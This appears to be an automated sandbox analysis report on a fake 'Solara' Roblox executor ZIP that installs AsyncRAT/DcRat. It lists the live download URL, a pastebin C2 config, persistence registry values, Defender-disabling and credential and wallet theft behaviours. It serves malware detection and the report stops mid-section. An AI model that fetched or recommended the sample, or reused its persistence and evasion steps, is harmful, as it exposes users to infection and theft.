Resubmissions
24-10-2024 19:59
241024-yqt7dsscpl 624-10-2024 19:55
241024-yndfvssclj 1024-10-2024 19:54
241024-ymwk2ssckm 824-10-2024 12:40
241024-pwm6la1hmn 1024-10-2024 12:34
241024-psafbs1gkr 1024-10-2024 12:24
241024-pk4zza1drl 1022-10-2024 13:05
241022-qbwsnsybrr 10Analysis
-
max time kernel
79s -
max time network
113s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
24-10-2024 19:55
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://raw.githubusercontent.com/ByterCode/Solara-Excutor/refs/heads/main/Solara%20NEW.zip
Resource
win10ltsc2021-20241023-en
General
-
Target
https://raw.githubusercontent.com/ByterCode/Solara-Excutor/refs/heads/main/Solara%20NEW.zip
Malware Config
Extracted
asyncrat
1.0.7
Roblox
DcRatMutex_qwqdanchun
-
delay
1
-
install
true
-
install_file
svchost.exe
-
install_folder
%AppData%
-
pastebin_config
https://pastebin.com/raw/rACMKa5f
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 3296 MpCmdRun.exe -
Modifies WinLogon for persistence 2 TTPs 6 IoCs
Processes:
RunShell.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Public\\Music\\cmd.exe\"" RunShell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Public\\Music\\cmd.exe\", \"C:\\Users\\Admin\\Cookies\\fontdrvhost.exe\"" RunShell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Public\\Music\\cmd.exe\", \"C:\\Users\\Admin\\Cookies\\fontdrvhost.exe\", \"C:\\agentComponentFontNet\\cmd.exe\"" RunShell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Public\\Music\\cmd.exe\", \"C:\\Users\\Admin\\Cookies\\fontdrvhost.exe\", \"C:\\agentComponentFontNet\\cmd.exe\", \"C:\\Windows\\CbsTemp\\conhost.exe\"" RunShell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Public\\Music\\cmd.exe\", \"C:\\Users\\Admin\\Cookies\\fontdrvhost.exe\", \"C:\\agentComponentFontNet\\cmd.exe\", \"C:\\Windows\\CbsTemp\\conhost.exe\", \"C:\\Recovery\\WindowsRE\\timeout.exe\"" RunShell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Public\\Music\\cmd.exe\", \"C:\\Users\\Admin\\Cookies\\fontdrvhost.exe\", \"C:\\agentComponentFontNet\\cmd.exe\", \"C:\\Windows\\CbsTemp\\conhost.exe\", \"C:\\Recovery\\WindowsRE\\timeout.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\Windows\\Defender\\RunShell.exe\"" RunShell.exe -
Process spawned unexpected child process 18 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7048 4672 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6864 4672 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7124 4672 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6836 4672 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5736 4672 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7136 4672 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6936 4672 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6968 4672 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6688 4672 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6712 4672 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6256 4672 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5844 4672 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6908 4672 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6232 4672 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5956 4672 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5360 4672 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5616 4672 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2784 4672 schtasks.exe -
Async RAT payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\Windows\Defender\MpWinSDK.exe family_asyncrat -
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreService.exe dcrat C:\Users\Admin\AppData\Roaming\Windows\Defender\MpCmdRun.exe dcrat behavioral1/memory/6456-860-0x0000000000200000-0x0000000000376000-memory.dmp dcrat behavioral1/memory/4708-890-0x0000000000620000-0x00000000007AA000-memory.dmp dcrat -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1304 powershell.exe 2548 powershell.exe 5228 powershell.exe 2092 powershell.exe 408 powershell.exe 5728 powershell.exe 6760 powershell.exe 6156 powershell.exe 6224 powershell.exe 3608 powershell.exe 4140 powershell.exe 848 powershell.exe 5220 powershell.exe 5456 powershell.exe 4824 powershell.exe 5476 powershell.exe 804 powershell.exe 6244 powershell.exe 6712 powershell.exe -
Drops file in Drivers directory 3 IoCs
Processes:
attrib.exeMpWinDefenderService.exeattrib.exedescription ioc process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts MpWinDefenderService.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
reg.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion reg.exe -
Checks computer location settings 2 TTPs 9 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WinDefender.exeMpDefenderCoreService.exeWScript.exeMpWinSDK.exeWScript.exeWinSFX.exeMpCmdRun.exeWScript.exeRunShell.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation WinDefender.exe Key value queried \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation MpDefenderCoreService.exe Key value queried \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation MpWinSDK.exe Key value queried \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation WinSFX.exe Key value queried \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation MpCmdRun.exe Key value queried \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation RunShell.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
-
Drops startup file 1 IoCs
Processes:
javaw.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinSFX.exe javaw.exe -
Executes dropped EXE 13 IoCs
Processes:
WinSFX.exeMpWinHelper32.exeWinDefender.exeMpDefenderRuntime.exeMpWinDefenderService.exeMpDefenderCoreService.exeMpWinDefenderService.exeMpCmdRun.exeMpWinSDK.execontainerRuntime.exeRunShell.exeMsHyperPort.exesvchost.exepid process 5684 WinSFX.exe 5936 MpWinHelper32.exe 5992 WinDefender.exe 6064 MpDefenderRuntime.exe 4844 MpWinDefenderService.exe 3164 MpDefenderCoreService.exe 5136 MpWinDefenderService.exe 4480 MpCmdRun.exe 5400 MpWinSDK.exe 6456 containerRuntime.exe 2548 RunShell.exe 4708 MsHyperPort.exe 6660 svchost.exe -
Loads dropped DLL 17 IoCs
Processes:
javaw.exeMpWinDefenderService.exepid process 1084 javaw.exe 5136 MpWinDefenderService.exe 5136 MpWinDefenderService.exe 5136 MpWinDefenderService.exe 5136 MpWinDefenderService.exe 5136 MpWinDefenderService.exe 5136 MpWinDefenderService.exe 5136 MpWinDefenderService.exe 5136 MpWinDefenderService.exe 5136 MpWinDefenderService.exe 5136 MpWinDefenderService.exe 5136 MpWinDefenderService.exe 5136 MpWinDefenderService.exe 5136 MpWinDefenderService.exe 5136 MpWinDefenderService.exe 5136 MpWinDefenderService.exe 5136 MpWinDefenderService.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 12 IoCs
Processes:
RunShell.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Users\\Public\\Music\\cmd.exe\"" RunShell.exe Set value (str) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Users\\Admin\\Cookies\\fontdrvhost.exe\"" RunShell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Users\\Admin\\Cookies\\fontdrvhost.exe\"" RunShell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\agentComponentFontNet\\cmd.exe\"" RunShell.exe Set value (str) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Windows\\CbsTemp\\conhost.exe\"" RunShell.exe Set value (str) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\timeout = "\"C:\\Recovery\\WindowsRE\\timeout.exe\"" RunShell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\timeout = "\"C:\\Recovery\\WindowsRE\\timeout.exe\"" RunShell.exe Set value (str) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Users\\Public\\Music\\cmd.exe\"" RunShell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RunShell = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows\\Defender\\RunShell.exe\"" RunShell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Windows\\CbsTemp\\conhost.exe\"" RunShell.exe Set value (str) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RunShell = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows\\Defender\\RunShell.exe\"" RunShell.exe Set value (str) \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\agentComponentFontNet\\cmd.exe\"" RunShell.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
javaw.exedescription ioc process File opened (read-only) \??\F: javaw.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 14 IoCs
Processes:
flow ioc 66 raw.githubusercontent.com 109 discord.com 111 discord.com 114 raw.githubusercontent.com 3 raw.githubusercontent.com 58 discord.com 57 discord.com 65 raw.githubusercontent.com 82 pastebin.com 4 raw.githubusercontent.com 61 discord.com 115 raw.githubusercontent.com 78 pastebin.com 110 discord.com -
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 54 ip-api.com 86 ip-api.com 102 api.ipify.org 103 api.ipify.org 104 ip-api.com 106 api.ipify.org 52 api.ipify.org 53 api.ipify.org -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Drops file in System32 directory 3 IoCs
Processes:
csc.exeMpWinHelper32.exedescription ioc process File created \??\c:\Windows\System32\CSCF2DDC31CC0FA4B7587773868A7DDDFE8.TMP csc.exe File created \??\c:\Windows\System32\ubvues.exe csc.exe File created C:\Windows\system32\GoogleUpdater.exe MpWinHelper32.exe -
Enumerates processes with tasklist 1 TTPs 4 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exepid process 3860 tasklist.exe 4164 tasklist.exe 6492 tasklist.exe 6216 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI48442\python313.dll upx behavioral1/memory/5136-610-0x00007FFA1ABC0000-0x00007FFA1B223000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI48442\libffi-8.dll upx behavioral1/memory/5136-647-0x00007FFA2C8F0000-0x00007FFA2C8FF000-memory.dmp upx behavioral1/memory/5136-646-0x00007FFA1BF90000-0x00007FFA1BFB7000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI48442\_ssl.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI48442\_sqlite3.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI48442\_lzma.pyd upx behavioral1/memory/5136-664-0x00007FFA1BF60000-0x00007FFA1BF8B000-memory.dmp upx behavioral1/memory/5136-668-0x00007FFA1BF30000-0x00007FFA1BF55000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI48442\sqlite3.dll upx behavioral1/memory/5136-672-0x00007FFA1BF10000-0x00007FFA1BF29000-memory.dmp upx behavioral1/memory/5136-674-0x00007FFA1BED0000-0x00007FFA1BF04000-memory.dmp upx behavioral1/memory/5136-684-0x00007FFA1ABC0000-0x00007FFA1B223000-memory.dmp upx behavioral1/memory/5136-686-0x00007FFA1A970000-0x00007FFA1AA3E000-memory.dmp upx behavioral1/memory/5136-685-0x00007FFA19410000-0x00007FFA19943000-memory.dmp upx behavioral1/memory/5136-688-0x00007FFA2BFD0000-0x00007FFA2BFDD000-memory.dmp upx behavioral1/memory/5136-692-0x00007FFA1A8B0000-0x00007FFA1A963000-memory.dmp upx behavioral1/memory/5136-687-0x00007FFA1BEB0000-0x00007FFA1BEC4000-memory.dmp upx behavioral1/memory/5136-673-0x00007FFA2C860000-0x00007FFA2C86D000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI48442\_socket.pyd upx behavioral1/memory/5136-670-0x00007FFA1AA40000-0x00007FFA1ABBF000-memory.dmp upx behavioral1/memory/5136-667-0x00007FFA1E2B0000-0x00007FFA1E2C9000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI48442\_bz2.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI48442\_queue.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI48442\_hashlib.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI48442\_decimal.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI48442\unicodedata.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI48442\select.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI48442\libssl-3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI48442\libcrypto-3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI48442\_ctypes.pyd upx behavioral1/memory/5136-713-0x00007FFA1AA40000-0x00007FFA1ABBF000-memory.dmp upx behavioral1/memory/5136-712-0x00007FFA1BF30000-0x00007FFA1BF55000-memory.dmp upx behavioral1/memory/5136-907-0x00007FFA1BED0000-0x00007FFA1BF04000-memory.dmp upx behavioral1/memory/5136-946-0x00007FFA19410000-0x00007FFA19943000-memory.dmp upx behavioral1/memory/5136-951-0x00007FFA1A970000-0x00007FFA1AA3E000-memory.dmp upx -
Drops file in Program Files directory 2 IoCs
Processes:
setup.exedescription ioc process File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20241024195558.pma setup.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\0cdc6174-aa79-4e44-a931-d9fc9c4c0847.tmp setup.exe -
Drops file in Windows directory 2 IoCs
Processes:
RunShell.exedescription ioc process File created C:\Windows\CbsTemp\conhost.exe RunShell.exe File created C:\Windows\CbsTemp\088424020bedd6 RunShell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
cmd.exeSolara NEW.exeWinSFX.exeWScript.exeWScript.exeWScript.execmd.execmd.exeWinDefender.exeMpDefenderCoreService.exeMpCmdRun.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Solara NEW.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WinSFX.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WinDefender.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MpDefenderCoreService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MpCmdRun.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 6696 timeout.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Kills process with taskkill 18 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 6848 taskkill.exe 7096 taskkill.exe 6592 taskkill.exe 5376 taskkill.exe 2180 taskkill.exe 3620 taskkill.exe 804 taskkill.exe 5180 taskkill.exe 6748 taskkill.exe 5848 taskkill.exe 5828 taskkill.exe 6892 taskkill.exe 6544 taskkill.exe 5412 taskkill.exe 6520 taskkill.exe 5192 taskkill.exe 6992 taskkill.exe 5480 taskkill.exe -
Modifies registry class 5 IoCs
Processes:
MpCmdRun.exeRunShell.exemsedge.exeWinSFX.exeMpDefenderCoreService.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings MpCmdRun.exe Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings RunShell.exe Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings WinSFX.exe Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings MpDefenderCoreService.exe -
Modifies registry key 1 TTPs 3 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 20 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 7056 schtasks.exe 5736 schtasks.exe 7136 schtasks.exe 5844 schtasks.exe 7124 schtasks.exe 6968 schtasks.exe 6712 schtasks.exe 5360 schtasks.exe 2784 schtasks.exe 7048 schtasks.exe 6836 schtasks.exe 6936 schtasks.exe 6688 schtasks.exe 6908 schtasks.exe 5956 schtasks.exe 5656 schtasks.exe 6864 schtasks.exe 6256 schtasks.exe 6232 schtasks.exe 5616 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
msedge.exemsedge.exeidentity_helper.exemsedge.exejavaw.exewmic.exepowershell.exepowershell.exeMpDefenderRuntime.exeMpWinHelper32.exepowershell.exepowershell.exepowershell.exepowershell.exeMpWinSDK.exepid process 1008 msedge.exe 1008 msedge.exe 1068 msedge.exe 1068 msedge.exe 4204 identity_helper.exe 4204 identity_helper.exe 2380 msedge.exe 2380 msedge.exe 1084 javaw.exe 1084 javaw.exe 1084 javaw.exe 1084 javaw.exe 1084 javaw.exe 1084 javaw.exe 1084 javaw.exe 1084 javaw.exe 1084 javaw.exe 1084 javaw.exe 1084 javaw.exe 1084 javaw.exe 1084 javaw.exe 1084 javaw.exe 1084 javaw.exe 1084 javaw.exe 1084 javaw.exe 1084 javaw.exe 1084 javaw.exe 1084 javaw.exe 5112 wmic.exe 5112 wmic.exe 5112 wmic.exe 5112 wmic.exe 1084 javaw.exe 1084 javaw.exe 1084 javaw.exe 848 powershell.exe 848 powershell.exe 4824 powershell.exe 4824 powershell.exe 848 powershell.exe 4824 powershell.exe 6064 MpDefenderRuntime.exe 6064 MpDefenderRuntime.exe 5936 MpWinHelper32.exe 5936 MpWinHelper32.exe 6064 MpDefenderRuntime.exe 6064 MpDefenderRuntime.exe 408 powershell.exe 408 powershell.exe 408 powershell.exe 2092 powershell.exe 2092 powershell.exe 1304 powershell.exe 1304 powershell.exe 5220 powershell.exe 5220 powershell.exe 5400 MpWinSDK.exe 5400 MpWinSDK.exe 5400 MpWinSDK.exe 5400 MpWinSDK.exe 5400 MpWinSDK.exe 5400 MpWinSDK.exe 5400 MpWinSDK.exe 5400 MpWinSDK.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 672 -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
Processes:
msedge.exepid process 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe 1068 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
javaw.exewmic.exepowershell.exepowershell.exedescription pid process Token: SeBackupPrivilege 1084 javaw.exe Token: SeBackupPrivilege 1084 javaw.exe Token: SeSecurityPrivilege 1084 javaw.exe Token: SeDebugPrivilege 1084 javaw.exe Token: SeIncreaseQuotaPrivilege 5112 wmic.exe Token: SeSecurityPrivilege 5112 wmic.exe Token: SeTakeOwnershipPrivilege 5112 wmic.exe Token: SeLoadDriverPrivilege 5112 wmic.exe Token: SeSystemProfilePrivilege 5112 wmic.exe Token: SeSystemtimePrivilege 5112 wmic.exe Token: SeProfSingleProcessPrivilege 5112 wmic.exe Token: SeIncBasePriorityPrivilege 5112 wmic.exe Token: SeCreatePagefilePrivilege 5112 wmic.exe Token: SeBackupPrivilege 5112 wmic.exe Token: SeRestorePrivilege 5112 wmic.exe Token: SeShutdownPrivilege 5112 wmic.exe Token: SeDebugPrivilege 5112 wmic.exe Token: SeSystemEnvironmentPrivilege 5112 wmic.exe Token: SeRemoteShutdownPrivilege 5112 wmic.exe Token: SeUndockPrivilege 5112 wmic.exe Token: SeManageVolumePrivilege 5112 wmic.exe Token: 33 5112 wmic.exe Token: 34 5112 wmic.exe Token: 35 5112 wmic.exe Token: 36 5112 wmic.exe Token: SeIncreaseQuotaPrivilege 5112 wmic.exe Token: SeSecurityPrivilege 5112 wmic.exe Token: SeTakeOwnershipPrivilege 5112 wmic.exe Token: SeLoadDriverPrivilege 5112 wmic.exe Token: SeSystemProfilePrivilege 5112 wmic.exe Token: SeSystemtimePrivilege 5112 wmic.exe Token: SeProfSingleProcessPrivilege 5112 wmic.exe Token: SeIncBasePriorityPrivilege 5112 wmic.exe Token: SeCreatePagefilePrivilege 5112 wmic.exe Token: SeBackupPrivilege 5112 wmic.exe Token: SeRestorePrivilege 5112 wmic.exe Token: SeShutdownPrivilege 5112 wmic.exe Token: SeDebugPrivilege 5112 wmic.exe Token: SeSystemEnvironmentPrivilege 5112 wmic.exe Token: SeRemoteShutdownPrivilege 5112 wmic.exe Token: SeUndockPrivilege 5112 wmic.exe Token: SeManageVolumePrivilege 5112 wmic.exe Token: 33 5112 wmic.exe Token: 34 5112 wmic.exe Token: 35 5112 wmic.exe Token: 36 5112 wmic.exe Token: SeDebugPrivilege 848 powershell.exe Token: SeDebugPrivilege 4824 powershell.exe Token: SeIncreaseQuotaPrivilege 848 powershell.exe Token: SeSecurityPrivilege 848 powershell.exe Token: SeTakeOwnershipPrivilege 848 powershell.exe Token: SeLoadDriverPrivilege 848 powershell.exe Token: SeSystemProfilePrivilege 848 powershell.exe Token: SeSystemtimePrivilege 848 powershell.exe Token: SeProfSingleProcessPrivilege 848 powershell.exe Token: SeIncBasePriorityPrivilege 848 powershell.exe Token: SeCreatePagefilePrivilege 848 powershell.exe Token: SeBackupPrivilege 848 powershell.exe Token: SeRestorePrivilege 848 powershell.exe Token: SeShutdownPrivilege 848 powershell.exe Token: SeDebugPrivilege 848 powershell.exe Token: SeSystemEnvironmentPrivilege 848 powershell.exe Token: SeRemoteShutdownPrivilege 848 powershell.exe Token: SeUndockPrivilege 848 powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
